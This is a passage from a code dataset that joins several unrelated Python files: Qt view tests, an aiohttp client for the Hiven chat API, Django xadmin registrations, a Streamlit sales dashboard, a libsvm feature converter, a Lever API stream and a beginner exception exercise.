test_on_double_clicked_second_column(\n qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame\n):\n def variable_data(index):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n data = simple_view.model().data_at_index(index.siblingAtColumn(0))\n return test_data == data\n\n point = simple_view.visualRect(simple_view.model().index(1, 1)).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.doubleClicked, simple_view.itemDoubleClicked]\n callbacks = [variable_data, None]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mouseClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n qtbot.mouseDClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef test_on_pressed(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n\n def variable_data1(index):\n data = simple_view.model().data_at_index(index)\n return test_data == data\n\n def variable_data2(vd):\n return vd == [test_data]\n\n index = simple_view.model().index(1, 0)\n point = simple_view.visualRect(index).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.pressed, simple_view.selectionPopulated]\n callbacks = [variable_data1, variable_data2]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mousePress(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef test_on_pressed_right_mb(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n index = simple_view.model().index(1, 0)\n point = simple_view.visualRect(index).center()\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n with qtbot.assert_not_emitted(simple_view.pressed, ):\n qtbot.mousePress(simple_view.viewport(), Qt.RightButton, pos=point)\n\n\ndef test_is_tree_kwarg(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(variables_df=daily_df, interval=\"daily\", is_tree=True)\n # simpleview is always plain table\n assert not simple_view.is_tree\n\n\ndef test_filter_view(simple_view: SimpleView):\n ft = FilterTuple(key=\"block1:zonea\", variable=\"temperature\", units=\"\")\n simple_view.filter_view(ft)\n\n assert simple_view.model().rowCount() == 5\n assert simple_view.model().sourceModel().rowCount() == 49\n assert simple_view.model().filter_tuple == ft\n\n test_data = [\n VariableData(\"\", \"Site Outdoor Air Dewpoint Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Site Outdoor Air Drybulb Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Mean Air Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Mean Radiant Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Operative Temperature\", \"C\", \"C\"),\n ]\n\n for i, test_var in enumerate(test_data):\n index = simple_view.model().index(i, 0)\n data = simple_view.model().data_at_index(index)\n assert data == test_var\n\n\ndef test_get_visual_names(simple_view: SimpleView):\n assert simple_view.get_visual_names() == (\"variable\", \"units\")\n\n simple_view.reshuffle_columns((\"units\", \"variable\"))\n assert simple_view.get_visual_names() == (\"units\", \"variable\")\n\n\ndef test_get_visual_ixs(simple_view: SimpleView):\n assert simple_view.get_visual_indexes() == {\"variable\": 0, \"units\": 1}\n\n\ndef test_build_view_kwargs_rate_to_energy(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, rate_to_energy=True)\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"J\")\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"J\"\n\n\ndef test_build_view_kwargs_units_system(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, units_system=\"IP\")\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Site Outdoor Air Dewpoint Temperature\", \"C\", \"F\")\n\n assert proxy_model.data_at_index(proxy_model.index(22, 0)) == test_data\n assert proxy_model.data(proxy_model.index(22, 1)) == \"F\"\n\n\ndef test_build_view_kwargs_energy_units(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(\n daily_df, \"daily\", is_tree=True, rate_to_energy=True, energy_units=\"MWh\"\n )\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"MWh\")\n\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"MWh\"\n\n\ndef test_build_view_kwargs_power_units(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, power_units=\"MW\")\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"MW\")\n\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"MW\"\n\n\ndef test_update_view_appearance(simple_view: SimpleView, daily_df: pd.DataFrame):\n header = (\"units\", \"variable\")\n simple_view.populate_view(\n daily_df, \"daily\", header=header,\n )\n\n widths = {\"fixed\": 50}\n simple_view.update_view_appearance(header=header, widths=widths)\n\n assert simple_view.header().sectionSize(0) == 50\n assert simple_view.header().sectionSize(1) == 350\n\n assert simple_view.get_visual_names() == (\"units\", \"variable\")\n\n\ndef test_update_view_appearance_default(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.update_view_appearance()\n\n assert simple_view.header().sectionSize(0) == 330\n assert simple_view.header().sectionSize(1) == 70\n\n assert simple_view.get_visual_names() == (\"variable\", \"units\")\n\n\ndef test_scroll_to(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n v = VariableData(\"\", \"Zone Infiltration Air Change Rate\", \"ach\", \"ach\")\n with qtbot.wait_signal(simple_view.verticalScrollBar().valueChanged):\n simple_view.scroll_to(v, \"variable\")\n\n assert simple_view.verticalScrollBar().value() == 27\n\n\ndef test_deselect_variables(qtbot, simple_view: SimpleView, daily_df: pd.DataFrame):\n selected = [\n VariableData(\"\", \"Boiler Ancillary Electric Power\", \"W\", \"kW\"),\n VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"kW\"),\n ]\n simple_view.populate_view(\n daily_df, \"daily\", power_units=\"kW\",\n )\n simple_view.update_view_appearance()\n simple_view.select_variables(selected)\n proxy_rows = simple_view.selectionModel().selectedRows()\n variables_data = [simple_view.model().data_at_index(index) for index in proxy_rows]\n\n assert selected == variables_data\n\n with qtbot.wait_signal(simple_view.selectionCleared):\n simple_view.deselect_all_variables()\n\n assert not simple_view.selectionModel().selectedRows()\n\n\ndef test_select_variables(qtbot, simple_view: SimpleView):\n def variable_data(data):\n return data == selected\n\n selected = [\n VariableData(\"\", \"Boiler Ancillary Electric Power\", \"W\", \"W\"),\n VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\"),\n ]\n\n with qtbot.wait_signal(simple_view.selectionPopulated, check_params_cb=variable_data):\n simple_view.select_variables(selected)\n\n proxy_rows = simple_view.selectionModel().selectedRows()\n variables_data = [simple_view.model().data_at_index(index) for index in proxy_rows]\n\n assert selected == variables_data\n\n\ndef test_select_variables_invalid(qtbot, simple_view: SimpleView):\n selected = [VariableData(\"\", \"FOO\", \"W\", \"W\"), VariableData(\"\", \"BAR\", \"W\", \"W\")]\n\n with qtbot.wait_signal(simple_view.selectionCleared):\n simple_view.select_variables(selected)\n\n\ndef test_drag(qtbot, simple_view: SimpleView):\n # difficult to test something properly as QTest mouse\n # actions do not have an impact on drag and drop\n import threading\n\n def drag():\n simple_view.startDrag(Qt.CopyAction)\n\n t = threading.Thread(target=drag)\n t.start()\n t.join(0.1)\n","sub_path":"tests/ui/test_simpleview.py","file_name":"test_simpleview.py","file_ext":"py","file_size_in_byte":13274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"343910675","text":"import os\nimport aiohttp\nimport asyncio\nimport logging\nimport sys\nimport time\nimport json as json_decoder\nimport typing\n\n__all__ = 'HTTP'\n\nfrom .. import load_env, utils, exception as errs\n\nlogger = logging.getLogger(__name__)\n\n# Hiven API endpoint formatting\nrequest_url_format = \"https://{0}/{1}\"\n\n# Loading the environment variables\nload_env()\n# Setting the default values to the currently set defaults in the openhivenpy.env file\n_default_host = os.getenv(\"HIVEN_HOST\")\n_default_api_version = os.getenv(\"HIVEN_API_VERSION\")\n\n\nclass HTTP:\n \"\"\"\n HTTP-Client for requests and interaction with the Hiven API\n \"\"\"\n def __init__(self,\n token: str,\n *,\n event_loop: typing.Optional[asyncio.AbstractEventLoop],\n host: typing.Optional[str] = _default_host,\n api_version: typing.Optional[str] = _default_api_version):\n \"\"\"\n Object Instance Construction\n\n :param token: Authorisation Token for Hiven\n :param event_loop: Event loop that will be used to execute all async functions. Will use\n 'asyncio.get_event_loop()' to fetch the EventLoop. Will create a new one if no\n one was created yet\n :param host: Url for the API which will be used to interact with Hiven.\n Defaults to the pre-set environment host (api.hiven.io)\n :param api_version: Version string for the API Version. Defaults to the pre-set environment version (v1)\n \"\"\"\n self._token = token\n self.host = host\n self.api_version = api_version\n self.api_url = request_url_format.format(self.host, self.api_version)\n self.headers = {\"Authorization\": self._token, \"Host\": self.host} # Default header used for requests\n self._ready = False\n self._session = None # Will be created during start of connection\n self._event_loop = event_loop\n\n # Last/Currently executed request\n self._request = None\n\n def __str__(self) -> str:\n return repr(self)\n\n def __repr__(self) -> str:\n info = [\n ('ready', self.ready),\n ('host', self.host),\n ('api_version', self.api_version),\n ('headers', self.headers)\n ]\n return ''.format(' '.join('%s=%s' % t for t in info))\n\n @property\n def ready(self):\n return self._ready\n\n @property\n def session(self):\n return self._session\n\n @property\n def event_loop(self):\n return self._event_loop\n\n async def connect(self) -> typing.Union[aiohttp.ClientSession, None]:\n \"\"\"\n Establishes for the HTTP a connection to Hiven\n\n :return: The created aiohttp.ClientSession\n \"\"\"\n try:\n async def on_request_start(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] >> Request with HTTP {params.method} started at {time.time()}\")\n logger.debug(f\"[HTTP] >> URL >> {params.url}\")\n\n async def on_request_end(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] << Request with HTTP {params.method} finished!\")\n logger.debug(f\"[HTTP] << Header << {params.headers}\")\n logger.debug(f\"[HTTP] << URL << {params.url}\")\n logger.debug(f\"[HTTP] << Response << {params.response}\")\n\n async def on_request_exception(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] << An exception occurred while executing the request\")\n\n async def on_request_redirect(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] << REDIRECTING with URL {params.url} and HTTP {params.method}\")\n\n async def on_response_chunk_received(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] << Chunk Received << {params.chunk}\\n\")\n\n async def on_connection_queued_start(session, trace_config_ctx, params):\n logger.debug(f\"[HTTP] >> HTTP {params.method} with {params.url} queued!\")\n\n trace_config = aiohttp.TraceConfig()\n trace_config.on_request_start.append(on_request_start)\n trace_config.on_request_end.append(on_request_end)\n trace_config.on_request_exception.append(on_request_exception)\n trace_config.on_request_redirect.append(on_request_redirect)\n trace_config.on_connection_queued_start.append(on_connection_queued_start)\n trace_config.on_response_chunk_received.append(on_response_chunk_received)\n\n self._session = aiohttp.ClientSession(trace_configs=[trace_config])\n self._ready = True\n\n resp = await self.request(\"/users/@me\", timeout=30)\n if resp:\n logger.info(\"[HTTP] Session was successfully created!\")\n return self.session\n else:\n # If the request failed it will return None and log a warning\n logger.warning(\"[HTTP] Test Request for HTTP Initialisation failed! \")\n return None\n\n except Exception as e:\n utils.log_traceback(msg=\"[HTTP] Traceback:\",\n suffix=\"Failed to create HTTP-Session: \\n\"\n f\"> {sys.exc_info()[0].__name__}: {e}\")\n self._ready = False\n await self.session.close()\n raise errs.SessionCreateError(f\"Failed to create HTTP-Session! > {sys.exc_info()[0].__name__}: {e}\") from e\n\n async def close(self) -> bool:\n \"\"\"\n Closes the HTTP session that is currently connected to Hiven!\n\n :return: True if it was successful else False\n \"\"\"\n try:\n await self.session.close()\n self._ready = False\n return True\n\n except Exception as e:\n utils.log_traceback(msg=\"[CONNECTION] Traceback:\")\n logger.critical(f\"[HTTP] Failed to close HTTP Session: {sys.exc_info()[0].__name__}: {e}\")\n return False\n\n async def raw_request(\n self,\n endpoint: str,\n *,\n method: typing.Optional[str] = \"GET\",\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None, # Defaults to an empty header\n **kwargs) -> typing.Union[aiohttp.ClientResponse, None]:\n \"\"\"\n Wrapped HTTP request for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param method: HTTP Method that should be used to perform the request\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the aiohttp.ClientResponse object\n \"\"\"\n async def http_request(_endpoint: str,\n _method: str,\n _json: dict,\n _headers: dict,\n **_kwargs) -> typing.Union[aiohttp.ClientResponse, None]:\n \"\"\"\n The Function that stores the request and the handling of exceptions! Will be used as\n a variable so the status of the request can be seen by the asyncio.Task status!\n\n :param _endpoint: Endpoint of the request\n :param _method: HTTP method of the request\n :param _json: Additional JSON Data if it exists\n :param _headers: Headers that will be sent! Defaults to the ones that were created during initialisation\n :param _kwargs: Additional Parameter for the aiohttp HTTP Request\n :return: Returns the aiohttp.ClientResponse object\n \"\"\"\n if self._ready:\n try:\n # Creating a new ClientTimeout Instance which will default to having no timeout since\n # errors occurred using it! Timeout is therefore handled independently over the _time_out_handler()\n _timeout = aiohttp.ClientTimeout(total=None)\n\n # If no default headers were passed\n if _headers is None:\n _headers = self.headers\n\n url = f\"{self.api_url}{_endpoint}\"\n async with self.session.request(\n method=_method, # HTTP Method\n url=url, # Endpoint url\n headers=_headers, # Passing the headers directly without using the kwargs\n timeout=_timeout, # Timout Object => defaults to None since it caused issues in the past!\n json=_json,\n **_kwargs) as _resp:\n\n http_resp_code = _resp.status # HTTP Code Response\n data = await _resp.read() # Raw Text data\n\n if data:\n _json_data = json_decoder.loads(data) # Loading the data in json => will fail if not json\n _success = _json_data.get('success') # Fetching the success item <== bool\n\n if _success:\n logger.debug(\n f\"[HTTP] {http_resp_code} - Request was successful and received expected data!\")\n else:\n # If an error occurred the response body will contain an error field\n _error = _json_data.get('error')\n if _error:\n err_code = _error.get('code') # Error-Code\n err_msg = _error.get('message') # Error-Msg\n logger.error(f\"[HTTP] Failed HTTP request '{_method.upper()}'! {http_resp_code} -> \"\n f\"'{err_code}': '{err_msg}'\")\n else:\n logger.error(f\"[HTTP] Failed HTTP request '{_method.upper()}'! {http_resp_code} -> \"\n f\"Response: None\")\n else:\n # Empty Responses are generally unexpected for an Hiven API Response and therefore are\n # counted as possible issues if the code is 204. If not it's an exception since data was\n # expected but not received!\n if http_resp_code == 204:\n logger.debug(\"[HTTP] Received empty response!\")\n else:\n logger.error(\"[HTTP] Received empty response!\")\n\n return _resp\n\n except Exception as _e:\n utils.log_traceback(msg=\"[HTTP] Traceback:\",\n suffix=f\"HTTP '{_method.upper()}' failed with endpoint: {_endpoint}: \\n\"\n f\"{sys.exc_info()[0].__name__}, {_e}\")\n\n else:\n logger.error(f\"[HTTP] << The HTTPClient was not ready when trying to perform request with \"\n f\"HTTP {_method}! The session is either not initialised or closed!\")\n return None\n\n self._request = asyncio.create_task(http_request(endpoint, method, json, headers, **kwargs))\n try:\n http_client_response = await asyncio.wait_for(self._request, timeout=timeout)\n\n except asyncio.CancelledError:\n logger.warning(f\"[HTTP] >> Request '{method.upper()}' for endpoint '{endpoint}' was cancelled!\")\n return\n\n except asyncio.TimeoutError:\n logger.warning(f\"[HTTP] >> Request '{method.upper()}' for endpoint '{endpoint} timeout after {timeout}s!\")\n http_client_response = None\n\n except Exception as e:\n utils.log_traceback(msg=\"[HTTP] Suffix\",\n suffix=f\"HTTP '{method.upper()}' failed with endpoint: {self.host}{endpoint}: \\n\"\n f\"{sys.exc_info()[0].__name__}: {e}\")\n raise errs.HTTPError(f\"HTTP '{method.upper()}' failed with endpoint: \"\n f\"{self.host}{endpoint}: {sys.exc_info()[0].__name__}: {e}\")\n\n # Returning the response instance\n return http_client_response\n\n async def request(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> typing.Union[dict, None]:\n \"\"\"\n Wrapped HTTP 'GET' request for a specified endpoint, which returns only the response data!\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: A python dictionary containing the response data if successful and else returns `None`\n \"\"\"\n resp = await self.raw_request(endpoint, method=\"GET\", timeout=timeout, json=json, headers=headers, **kwargs)\n if resp is not None and resp.status < 300:\n if resp.status < 300 and resp.status != 204:\n # Returning the data in json format (dict)\n return await resp.json()\n else:\n return None\n else:\n return None\n\n async def get(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'GET' request for a specified endpoint\n\n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n return await self.raw_request(\n endpoint,\n method=\"POST\",\n json=json,\n headers=headers,\n timeout=timeout,\n **kwargs)\n\n async def post(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'POST' for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n # If no custom headers were passed a new one will be created and used\n if headers is None:\n # Creating a duplicate header of the default one\n headers = dict(self.headers)\n\n # Requires the Content-Type to be specified since else it cannot\n # recognise the json-data in the body!\n headers['Content-Type'] = 'application/json'\n\n return await self.raw_request(\n endpoint,\n method=\"POST\",\n json=json,\n headers=headers,\n timeout=timeout,\n **kwargs)\n\n async def delete(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'DELETE' for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n return await self.raw_request(\n endpoint,\n method=\"DELETE\",\n json=json,\n timeout=timeout,\n headers=headers,\n **kwargs)\n\n async def put(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'PUT' for a specified endpoint.\n \n Similar to post, but multiple requests do not affect performance\n\n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n # If no custom headers were passed a new one will be created and used\n if headers is None:\n # Creating a duplicate header of the default one\n headers = dict(self.headers)\n\n # Requires the Content-Type to be specified since else it cannot\n # recognise the json-data in the body!\n headers['Content-Type'] = 'application/json'\n\n return await self.raw_request(\n endpoint,\n method=\"PUT\",\n json=json,\n timeout=timeout,\n headers=headers, # Passing the new header for the request\n **kwargs)\n\n async def patch(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'PATCH' for a specified endpoint.\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n # If no custom headers were passed a new one will be created and used\n if headers is None:\n # Creating a duplicate header of the default one\n headers = dict(self.headers)\n\n # Requires the Content-Type to be specified since else it cannot\n # recognise the json-data in the body!\n headers['Content-Type'] = 'application/json'\n\n return await self.raw_request(\n endpoint,\n method=\"PATCH\",\n json=json,\n headers=headers,\n timeout=timeout,\n **kwargs)\n\n async def options(self,\n endpoint: str,\n *,\n json: typing.Optional[dict] = None,\n timeout: typing.Optional[int] = 15,\n headers: typing.Optional[dict] = None,\n **kwargs) -> aiohttp.ClientResponse:\n \"\"\"\n Wrapped HTTP 'OPTIONS' for a specified endpoint.\n \n Requests permission for performing communication with a URL or server\n \n :param endpoint: Url place in url format '/../../..' Will be appended to the standard link:\n 'https://api.hiven.io/{version}'\n :param json: JSON format data that will be appended to the request\n :param timeout: Time the server has time to respond before the connection timeouts. Defaults to 15\n :param headers: Defaults to the normal headers. Note: Changing content type can make the request break.\n Use with caution!\n :param kwargs: Other parameter for requesting.\n See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession for more info\n :return: Returns the ClientResponse object if successful and else returns `None`\n \"\"\"\n return await self.raw_request(\n endpoint,\n method=\"OPTIONS\",\n json=json,\n headers=headers,\n timeout=timeout,\n **kwargs)\n","sub_path":"openhivenpy/gateway/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":24092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"417955001","text":"import xadmin\n\nfrom .models import UserMessage, VideoComments, UserFavorite\n\n\nclass UserMessageAdmin(object):\n '''用户消息后台'''\n\n list_display = ['user', 'message', 'has_read', 'add_time']\n search_fields = ['user', 'message', 'has_read']\n list_filter = ['user', 'message', 'has_read', 'add_time']\n\n\n\nclass VideoCommentsAdmin(object):\n '''用户评论后台'''\n\n list_display = ['user', 'course', 'comments', 'add_time']\n search_fields = ['user', 'course', 'comments']\n list_filter = ['user', 'course', 'comments', 'add_time']\n\n\n\nclass UserFavoriteAdmin(object):\n '''用户收藏后台'''\n\n list_display = ['user', 'fav_id', 'add_time']\n search_fields = ['user', 'fav_id']\n list_filter = ['user', 'fav_id', 'add_time']\n\n\n# 将后台管理器与models进行关联注册。\nxadmin.site.register(UserMessage, UserMessageAdmin)\nxadmin.site.register(VideoComments, VideoCommentsAdmin)\nxadmin.site.register(UserFavorite, UserFavoriteAdmin)","sub_path":"operation/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333235498","text":"\nimport pandas as pd\nimport streamlit as st\nimport altair as alt\n\ndf = pd.read_csv('~/Projects/general_learning/Quantium/QVI_data.csv')\ndf.info()\n\nst.write(\"\"\"\n# Sales Analysis\n\nThis app showing the sales changes over period\n\"\"\")\n\ndf['year_month'] = pd.to_datetime(df['DATE']).dt.floor('d') - pd.offsets.MonthBegin(1)\ndf = df.groupby([\"year_month\", \"LIFESTAGE\"])[\"TOT_SALES\"].sum().reset_index()\n\ndf = pd.pivot_table(df, values=\"TOT_SALES\", index=\"LIFESTAGE\", columns=\"year_month\")\n\nst.sidebar.header('Input Features')\nst.sidebar.subheader('Choose PREMIUM_CUSTOMER')\n\n\nstores = st.multiselect(\n \"Choose Lifestages\", list(df.index), [\"YOUNG FAMILIES\", \"OLDER FAMILIES\"]\n)\n\ndata = df.loc[stores]\nst.write(\"### Show Chosen Stores\", data.sort_index())\n\ndata = data.T.reset_index()\ndata = pd.melt(data, id_vars=[\"year_month\"])\n\nchart = (\n alt.Chart(data)\n .mark_area(opacity=0.3)\n .encode(\n x=\"year_month:T\",\n y=alt.Y(\"value:Q\", stack=None),\n color=\"LIFESTAGE:N\",\n )\n)\nst.altair_chart(chart, use_container_width=True)\n\n\n","sub_path":"DS Learning/sales_dashboard.py","file_name":"sales_dashboard.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"398604036","text":"#!/usr/bin/env python\n# -*- coding=utf8 -*-\n\nimport numpy as np\nimport sys\nsys.path.append('../utils/')\nfrom dataproc import *\nfrom datetime import datetime\n\n\ngender_encoder = DictTable({u'男': 0, u'女': 1})\n\n\ndef day_diff(d1, d2):\n d1 = datetime.strptime(d1, \"%d/%m/%Y\")\n d2 = datetime.strptime(d2, \"%d/%m/%Y\")\n return abs((d2 - d1).days)\n\n\ndef gender_transform(gender_cf):\n idx = gender_encoder.lookup(gender_cf)\n if idx[0] is None:\n return ['']\n else:\n return idx\n\n\ndef date_transform(dt):\n res = []\n for d in dt:\n res.append(day_diff(d, '01/09/2017'))\n return res\n\n\ndef drop_cf(cf, st, ed):\n return cf[:st] + cf[ed:]\n\n\ndef extend_cf(cf, st, ed, foo):\n return cf[:st] + foo(cf[st:ed]) + cf[ed:]\n\n\ndef cf2libsvm(label, cf):\n fstr = ''\n for idx, val in enumerate(cf):\n if val != '':\n fstr += str(idx+1) + ':' + str(val) + ' '\n if label == '':\n label = '0'\n return label + ' ' + fstr.rstrip(' ')\n\n\nif __name__ == '__main__':\n ifile = open(sys.argv[1])\n ofile = open(sys.argv[2], 'w')\n for ln in ifile:\n flds = ln.decode('utf8').rstrip('\\n').split('\\t')\n label = flds[0]\n feats = flds[1:]\n #feats = drop_cf(feats, 3, 4)\n feats = extend_cf(feats, 3, 4, date_transform)\n feats = extend_cf(feats, 1, 2, gender_transform)\n print >> ofile, cf2libsvm(label, feats)\n ifile.close()\n ofile.close()\n","sub_path":"gbdt_1/3_Feature.py","file_name":"3_Feature.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"439319196","text":"from tap_lever.streams.base import BaseStream\nfrom tap_lever.streams import cache as stream_cache\n\nimport singer\n\nLOGGER = singer.get_logger() # noqa\n\n\nclass CandidateApplicationsStream(BaseStream):\n API_METHOD = 'GET'\n TABLE = 'candidate_applications'\n\n @property\n def path(self):\n return '/candidates/{candidate_id}/applications'\n\n def get_url(self, candidate):\n _path = self.path.format(candidate_id=candidate)\n return 'https://api.lever.co/v1{}'.format(_path)\n\n def sync_data(self):\n table = self.TABLE\n\n candidates = stream_cache.get('candidates')\n LOGGER.info(\"Found {} candidates in cache\".format(len(candidates)))\n\n params = self.get_params(_next=None)\n for i, candidate in enumerate(candidates):\n LOGGER.info(\"Fetching referrals for candidate {} of {}\".format(i + 1, len(candidates)))\n candidate_id = candidate['id']\n url = self.get_url(candidate_id)\n resources = self.sync_paginated(url, params)\n","sub_path":"tap_lever/streams/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253909557","text":"'''\r\nCreated on Sep 10, 2015\r\n\r\n@author: scale 87762\r\n'''\r\ndef exceptioncontent():\r\n yoursmart=False\r\n while(yoursmart == False):\r\n try:\r\n a=int(input(\"Tell me your age\"))\r\n print(\"You were born in the year\", 2015-a)\r\n yoursmart=True\r\n except:\r\n print(\"You gave me a 